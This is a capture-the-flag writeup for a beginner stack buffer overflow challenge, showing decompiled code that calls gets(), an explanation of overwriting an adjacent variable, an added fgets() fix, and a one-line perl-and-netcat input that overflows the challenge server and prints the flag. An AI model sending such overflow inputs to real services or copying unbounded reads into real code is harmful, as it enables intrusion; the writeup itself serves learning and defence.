Tags: bof pwn 

## Description

I really want to have some coffee!

```
nc chall.csivit.com 30001
```

## Analysis

Decompile with Ghidra. `main()` is very simple:

```c
undefined8 main(void)
{
    char local_38 [44];
    int local_c;

    local_c = 0;
    setbuf(stdout,(char *)0x0);
    setbuf(stdin,(char *)0x0);
    setbuf(stderr,(char *)0x0);
    puts("Please pour me some coffee:");
    gets(local_38);
    puts("\nThanks!\n");
    if (local_c != 0) {
        puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
        system("cat flag.txt");
    }
    return 0;
}
```

This is the "hello world" of buffer overflows. `gets()` reads input into `local_38`, a buffer that holds 44 chars, with no length check. Immediately after it on the stack is `local_c`, which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input: the 45th byte lands in `local_c`.
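The fix for the bug analysed above, as an added example that is not part of the original writeup or the challenge binary: `gets()` is replaced by a bounded `fgets()` read, and the same 45-byte input is run through it to confirm the adjacent flag stays zero. `struct frame`, `read_line` and `spilled_after_input` are hypothetical names, and the struct is a constructed stand-in for the stack layout.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the decompiled frame: 44-byte buffer, then the flag int. */
struct frame { char order[44]; int spilled; };

/* Bounded replacement for gets(): stores at most size-1 bytes plus a NUL,
 * strips the newline, and discards the rest of an over-long line.
 * Returns the number of bytes kept, or -1 on EOF/error. */
static long read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {
        int c;                      /* line did not fit: drain the remainder */
        while ((c = getc(in)) != '\n' && c != EOF)
            ;
    }
    return (long)len;
}

/* Sends n 'A' bytes plus a newline through read_line(); returns spilled afterwards
 * (or -1 if the temporary file cannot be created). */
static int spilled_after_input(size_t n, long *kept)
{
    struct frame f = {0};
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    for (size_t i = 0; i < n; i++)
        fputc('A', in);
    fputc('\n', in);
    rewind(in);
    *kept = read_line(in, f.order, sizeof f.order);
    fclose(in);
    return f.spilled;
}

int main(void)
{
    long kept = 0;
    int spilled = spilled_after_input(45, &kept);   /* same length as the writeup's input */
    printf("kept=%ld spilled=%d\n", kept, spilled);
    return spilled != 0;
}
```

Passing `sizeof f.order` rather than a literal keeps the bound tied to the buffer if its size ever changes.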

## Solution

```
kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:

Thanks!

Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
```

Original writeup (https://github.com/dobsonj/ctf/tree/master/writeups/2020/csictf/pwn_intended#pwn-intended-0x1).